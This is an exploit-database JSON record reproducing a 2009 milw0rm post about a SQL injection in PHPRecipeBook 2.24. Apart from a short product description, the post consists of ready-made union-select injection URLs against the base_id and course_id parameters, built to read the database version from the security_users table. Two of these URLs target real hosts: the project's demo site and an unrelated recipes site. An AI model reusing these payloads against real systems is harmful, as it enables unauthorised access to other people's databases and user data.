{"type": "packetstorm", "published": "2009-03-09T00:00:00", "reporter": "d3b4g", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d4be9c4fc84262b4f39f89565918568f"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "6e1ced389950d874e86a49668f88ef64"}, {"key": "modified", "hash": "d2278ee294a2a84268e8b725e410ecf6"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "d2278ee294a2a84268e8b725e410ecf6"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "db44d57a1ab09372e2b2b453266cf06c"}, {"key": "sourceData", "hash": "f9b0c3d3824ae66e0997b7af026a3e2e"}, {"key": "sourceHref", "hash": "7f95e5cc3a3ce0c7e5fbf9c43c9973e4"}, {"key": "title", "hash": "2259820a428ebce1281a751f0e74a6f2"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "bulletinFamily": "exploit", "cvss": {"vector": "NONE", "score": 0.0}, "sourceData": "`[+] PHPRecipeBook 2.24 (_id)Remort SQL Injection Vulnerability \n[-] \n[+] Discovered By d3b4g \n[+] script: http://phprecipebook.sourceforge.net/demo/phprecipebook/ \n[+] Greetz : str0ke | Inerd | & friends \n[-] Follow me on twitter www.twitter.com/schaba \n \n \nAbout: \n------> \nPHPRecipeBook is a Web-based cookbook with the \nability to create shopping lists from recipes selected. \nThe lists can be saved and later reloaded and edited. \nThe shopping list also attempts to combine similar items \nso that duplication does not occur. \n \n \n \n/* start \n \n0x1 \n \nProof of concept \n------------------------------------- \n \nExploit:http:localhost.com[path]index.php?m=recipes&a=search&search=yes&base_id=5+union+all+select+1,2,concat(0x3a,@@version),4,5,6,7+from+security_users-- \n \nDemo:1 http://phprecipebook.sourceforge.net/demo/phprecipebook/index.php?m=recipes&a=search&search=yes&base_id=5+union+all+select+1,2,concat(0x3a,@@version),4,5,6,7+from+security_users-- \n \nDemo:2 http://recipes.casetaintor.com/index.php?m=recipes&a=search&search=yes&course_id=5+union+all+select+1,2,concat(0x3a,@@version),4,5,6,7+from+security_users-- \n \n \n/* end \n \n------------------------------------- \nFrom Tiny Little island of Maldivies \n------------------------------------- \n \n# milw0rm.com [2009-03-10]`\n", "viewCount": 0, "history": [], "lastseen": "2016-11-03T10:16:14", "objectVersion": "1.2", "href": "https://packetstormsecurity.com/files/75535/PHPRecipeBook-2.24-SQL-Injection.html", "sourceHref": "https://packetstormsecurity.com/files/download/75535/phprecipebook-sql.txt", "title": "PHPRecipeBook 2.24 SQL Injection", "enchantments": {"score": {"vector": "NONE", "value": 7.5}, "vulnersScore": 7.5}, "references": [], "id": "PACKETSTORM:75535", "hash": "3047d939bdb78a3c505a84fc40249bde2ce206f1f2b5fb73d39549693b83d73a", "edition": 1, "cvelist": [], "modified": "2009-03-09T00:00:00", "description": ""}

{}